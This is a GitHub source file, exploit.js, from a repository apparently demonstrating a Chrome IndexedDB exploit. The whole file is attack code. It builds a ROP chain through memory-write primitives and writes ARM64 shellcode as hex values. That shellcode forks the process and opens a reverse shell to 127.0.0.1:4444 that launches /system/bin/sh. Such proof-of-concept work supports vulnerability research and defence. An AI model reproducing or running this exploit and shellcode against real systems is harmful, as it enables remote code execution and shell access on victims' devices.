chrome_indexeddb_exploit/exploit.js at master · DimitriFourny/chrome_indexeddb_exploit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
function exploit() {
    /*
     *  General target settings.
     */
    set_offset_vtable(OFFSET_VTABLE);

    /*
     *  Place the ROP chain at the beginning of the slack memory space.
     */
    if (debug) {
        set_rop_start(0x112233445577n);
    } else {
        set_rop_start(G1);
    }
    write8_slack_base_plus_val(0x48+8, 0x100);
    write8_chrome_base_plus_val(0x100+0x100, G2);
    write8_chrome_base_plus_val(0x100+0x190, G3);
    write8_slack_base_plus_val(0x100+0x80, 0x300);
    write8_slack_base_plus_val(0x48+0x68+8, 0);
    write8_slack_base_plus_val(0x100, 0x260);
    write8_chrome_base_plus_val(0x260+0xf8, G4);
    write8_chrome_base_plus_val(0x100+0x18, G5);
    write8(0x100+0x38, 226);
    write8_chrome_base_plus_val(0x100+0x10, G6);
    write8_slack_base_plus_val(0x3b8, 0x1000);
    write8(0x300+0x28, 0);
    write8(0x300+0x20, 0);
    write8(0x300+0x18, 0);
    write8(0x300+0x10, 7);
    write8(0x300+0x8, 0x4000);
    write8_slack_base_aligned(0x300);

    /*
     *  Place shellcode after ROP chain in the slack memory space.
     */
    offset = 0x1000;

    /*
     * Shellcode for forking and process continuation.
     * Generated from shellcode/shellcode.S.
     */
    write8(offset, 0x4141414114000003n); offset += 8;
    write8(offset, 0xd280000041414141n); offset += 8;
    write8(offset, 0xd2800062d2820001n); offset += 8;
    write8(offset, 0x92800004d2800443n); offset += 8;
    write8(offset, 0xd2801bc8d2800005n); offset += 8;
    write8(offset, 0xaa0003e1d4000001n); offset += 8;
    write8(offset, 0xd2800000913fc021n); offset += 8;
    write8(offset, 0xd2800003d2800002n); offset += 8;
    write8(offset, 0xd4000001d2801b88n); offset += 8;
    write8(offset, 0x54000060f100001fn); offset += 8;
    write8(offset, 0xd65f03c058fffdben); offset += 8;

    /*
     *  Replace dummy value in shellcode for process continuation.
     */
    write8_chrome_base_plus_val(0x1000+4, OFFSET_RETURN);

    /*
     *  Reverse connect shellcode (127.0.0.1:4444).
     *  Generated from shellcode/reverse.S.
     */
    write8(offset, 0xd2800021d2800040n); offset += 8;
    write8(offset, 0xd28018c8d2800002n); offset += 8;
    write8(offset, 0xaa0003e4d4000001n); offset += 8;
    write8(offset, 0xd280020210000301n); offset += 8;
    write8(offset, 0xd4000001d2801968n); offset += 8;
    write8(offset, 0xaa0403e0d2800308n); offset += 8;
    write8(offset, 0xd2800002d2800001n); offset += 8;
    write8(offset, 0xaa0403e0d4000001n); offset += 8;
    write8(offset, 0xd2800002d2800021n); offset += 8;
    write8(offset, 0xaa0403e0d4000001n); offset += 8;
    write8(offset, 0xd2800002d2800041n); offset += 8;
    write8(offset, 0x10000120d4000001n); offset += 8;
    write8(offset, 0x910003e1f90003e0n); offset += 8;
    write8(offset, 0xd2801ba8d2800002n); offset += 8;
    write8(offset, 0x14000000d4000001n); offset += 8;
    write8(offset, 0x0100007f5c110002n); offset += 8;
    write8(offset, 0x2f6d65747379732fn); offset += 8;
    write8(offset, 0x000068732f6e6962n); offset += 8;
    write8(offset, 0x0000000000000000n); offset += 8;

   /*
    *  Finally launch the exploit.
    */
   start();
}